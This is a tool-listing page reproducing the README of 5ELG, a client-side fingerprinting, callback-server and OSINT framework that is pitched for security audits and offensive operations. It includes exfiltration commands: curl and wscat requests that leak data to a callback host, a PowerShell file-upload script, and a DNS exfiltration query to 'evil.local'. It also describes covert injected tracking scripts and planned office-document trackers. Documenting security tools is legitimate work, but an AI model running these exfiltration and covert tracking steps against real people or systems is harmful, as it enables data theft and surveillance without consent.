SkillAgentSearch skills...

5ELG

5ELG is a browser fingerprinting tool designed to collect and analyze data about a user's browser and environment through various modules called "dealers."

GenerateConvertImprove

Install / Use

/learn @jomoza/5ELG
About this skill

Quality Score

0/100

Category

Design

Supported Platforms

Universal

README

5ELG - bro5er dEaL finGerprinter

5ELG is an usefull cliend-side utilities freamwork with browser fingerprinting, request callback, and OSINT tool designed for cybersecurity professionals and enthusiasts. It captures detailed browser and system information, facilitates client-side exploitation testing, and supports OSINT operations through API integrations.

With a modular architecture, 5ELG combines fingerprinting, callback servers, file exfiltration, and OSINT functionalities, making it a powerful tool for security audits and offensive operations.

Table of Contents

Overview

✔️ OSINT Automation: Integrates APIs like Shodan, VirusTotal, WHOIS, and IPINFO to gather actionable intelligence on IPs and devices.
✔️ Callback Server: Captures requests via HTTP(S), WebSockets, DNS, and ICMP, enabling testing for SSRF, blind RCE, and XXE vulnerabilities.
✔️ Browser Fingerprinting: Generates unique browser/device fingerprints and collects comprehensive user environment data.
✔️ File Exfiltration: Allows secure file uploads for testing data leakage scenarios.
✔️ Custom Dealers: Modular backend components for managing requests and data collection across diverse platforms (web, PowerShell, hardware).

Installation

  1. Clone the Repository

    git clone https://github.com/jomoza/5ELG.git
cd 5ELG

  2. Install Dependencies

    npm install

  3. Set Up Environment Variables
    Create a .env file with your API keys and configuration settings:

    SHODAN_API_KEY=your_shodan_key
VIRUSTOTAL_API_KEY=your_virustotal_key
IPINFO_API_KEY=your_ipinfo_key
PORT=8080

  4. Start the Server

    npm start

Configuration

.env File

Configure the following variables:

SHODAN_API_KEY=your_shodan_key
VIRUSTOTAL_API_KEY=your_virustotal_key
IPINFO_API_KEY=your_ipinfo_key
PORT=8080

5ELG WEB PANEL

Callback Server

The callback server in 5ELG provides a powerful mechanism for observing and capturing outbound traffic generated by vulnerable or misconfigured systems. By leveraging protocols like HTTP and DNS, we can exfiltrate valuable data during penetration testing or simulate real-world exploitation scenarios.

The callback server supports multiple protocols, including:

  • HTTP(S): Analyze headers, methods, and request bodies.
  • WebSockets: Capture persistent communications.
  • DNS and ICMP: Handle stealthy callbacks for advanced testing.

Browser Fingerprinting

  • Captures detailed browser and system attributes:
    • Plugins, device properties, GPU model, media devices, local ip, permissions...
  • Includes NoScript Tracking for users with disabled JavaScript.
  • Combines data to create a unique fingerprint using SHA256 hashing.

OSINT

🕵️ Automated OSINT for IPs

  • Integrates APIs like IPINFO, WHOIS, Shodan, VirusTotal, CriminalIP, and more.
  • Collects geolocation, service details, reputation scores, and threat intelligence.
  • Correlates OSINT data with fingerprints for a comprehensive profile.

DATA EXILTRATION

Data exfiltration through various protocols using a callback server, as well as file reception via HTTP(S), are methods for receiving information from a client in multiple forms. This includes both exfiltrated information within the request and files from a device.

HTTP Data Exfiltration

HTTP is one of the most common ways to leak information from a target. By embedding sensitive data into HTTP headers or URL parameters, an attacker can extract valuable information when the target makes outbound requests to the callback server. Here's an example:

Exfiltrating Data via HTTP

curl -I "http://5elg.host/dealer/anyname.png?data=leak-url" \
  -H "user-agent: leak-ua" \
  -H "referer: data-leak-ref" \
  -H "Origin: data-leak-org"

USING WEBSOCKETS (EXEMPLE W/ WSCAT) WebSockets are enabled for both user fingerprinting and callback, allowing for data exfiltration. In the near future, they will also support file exfiltration.

wscat -c ws://10.13.37.40/leak-path -o "LEAK-HEADER" -H "User-Agent: leak-ws-ua"
Connected (press CTRL+C to quit)
< DEALED!
>
FILE EXFILTRATION USING HTTP SERVICE

The HTTP service allows for the upload of one or multiple files to the 5ELG system using an ID parameter that acts as an identifier for the machine. This functionality can be utilized for various purposes, such as data collection, remote diagnostics, or system monitoring.

Here an example of how to use PowerShell to send files to the 5ELG system:

$FilePath = "<PATH_TO_FILE>" #HERE THE FILEPATH
$ID = "<FILE-FINGERPRINT-ID>" #HERE THE ID (FOLDER NAME)
$Url = "http://<5ELG-HOST>/api/upload"
$Form = @{
    file = Get-Item -Path $FilePath
    ID = $ID
}
$boundary = [System.Guid]::NewGuid().ToString()
$bodyLines = @()
foreach ($key in $Form.Keys) {
    $bodyLines += "--$boundary"
    if ($Form[$key] -is [System.IO.FileInfo]) {
        $file = $Form[$key]
        $bodyLines += "Content-Disposition: form-data; name=`"$key`"; filename=`"$($file.Name)`""
        $bodyLines += "Content-Type: application/octet-stream"
        $bodyLines += ""
        $bodyLines += [System.IO.File]::ReadAllBytes($file.FullName)
    } else {
        $bodyLines += "Content-Disposition: form-data; name=`"$key`""
        $bodyLines += ""
        $bodyLines += $Form[$key]
    }
}
$bodyLines += "--$boundary--"
$body = [System.Text.Encoding]::UTF8.GetBytes($bodyLines -join "`r`n")
$authHeader = "Basic " + [Convert]::ToBase64String([Text.Encoding]::ASCII.GetBytes("5elg_username:5elg_password")) #CHANGE AUTH!
Invoke-WebRequest -Uri $Url -Method Post -Body $body -ContentType "multipart/form-data; boundary=$boundary" -Headers @{ Authorization = $authHeader }

DNS Data Exfiltration

DNS is a stealthier method for leaking data, as DNS queries are often allowed even in restricted environments. By encoding sensitive information into DNS queries, an attacker can exfiltrate data without relying on HTTP or other high-level protocols.

Example: Exfiltrating Data via DNS

dig @5elg.host LEAKDATA.evil.local TXT

DEALERS

Many of these dealers are still in the development phase and may not function perfectly. We are more than happy to receive your issues or ideas for new dealers, as well as suggestions for improvements or changes to existing ones. Your feedback is invaluable in helping us refine and expand the project to better meet the needs of the community.

The "merca", which refers to the JavaScript we inject to interact with the dealers, contains a variable called dealer_uri. This variable should be set to the URL of the DEALER. By doing so, regardless of whether the dealers are hosted on the same site or not, they can communicate seamlessly. This approach enhances the flexibility and reach of the project, allowing for more diversified actions.

JAVASCRIPT CONFIGURATION

<script>
      //DEALER_CLIENT_SIDE_CONFIG
	let velghost = "127.0.0.1"; #IP TO 5ELG FOR WS REQUEST
	let dealerUri = "/dealer.php"; #DEALER PATH, URL OR ONLY PATH
</script>

The dealer's backend can be hosted on a separate server and requires certain variables to be configured. These variables have the same names across all examples, regardless of the programming language being used.

PHP EXAMPLE

<?php
    $DEALER_NAME="PHP.DEALER"; //DEALER_NAME_IN_DASHBOARD
    $MODE="SENDER"; //SAVER or SENDER //DEALER_MODE    
    $URI_REZ="http://5elg.site:PORT/reciver"; //5ELG RECIVER URL IF SENDER	
    $PATH_WRITER="/tmp/out.csv";  //5ELG CSV URL IF SAVER
?>

JSP EXAMPLE

<%
	String DEALER_NAME = "JSP.DEALER"; 
	String MODE = "SENDER"; 
	String PATH_WRITER = "/tmp/out.csv";
	String URI_REZ = "http://5elg.site:PORT/reciver";
%>

ASP EXAMPLE

<%
    DEALER_NAME = "ASP.DEALER"
    MODE = "SENDER"
    PATH_WRITER = "C:\temp\out.csv"
    URI_REZ = "http://5elg.site:PORT/reciver"
%>

OFIMATIC DEALER

Additionally, we are considering the possibility of creating office-based DEALERS, such as DOCX, XLSX, and PDF files. These files would incorporate scripts or embedded resources that can trigger the browser in the background to capture and send requests. This opens up a wide range of possibilities for collecting data in more discreet and creative ways. By embedding tracking mechanisms directly into common office documents, we can execute actions like fingerprinting without relying solely on traditional web-based environments. These office-based DEALERS provide an innovative approach to expanding the scope of data collection and interaction, making the system more versatile and adaptable to different contexts.

POWERSHELL DEALER

This same approach can be integrated into Bash scripts, PowerShell, and many other operating system functions that support JavaScript execution. By leveraging the flexibility of these scripting environments, we can execute fingerprinting and data collection processes seamlessly across various platforms.

HARDWARE DEALER

Finally, it’s possible to configure devices, such as Arduinos or Flipper Zeros, to force these requests as well. These devices can be programmed to interact with the dealers, triggering the collection of data from target systems in a more covert manner. This expands the versatility of the

jomoza

View profile

View on GitHub
GitHub Stars22
CategoryDesign
Updated6mo ago
Forks0
jomoza/5ELG

Languages

JavaScript

Security Score

72/100

Audited on Sep 11, 2025

No findings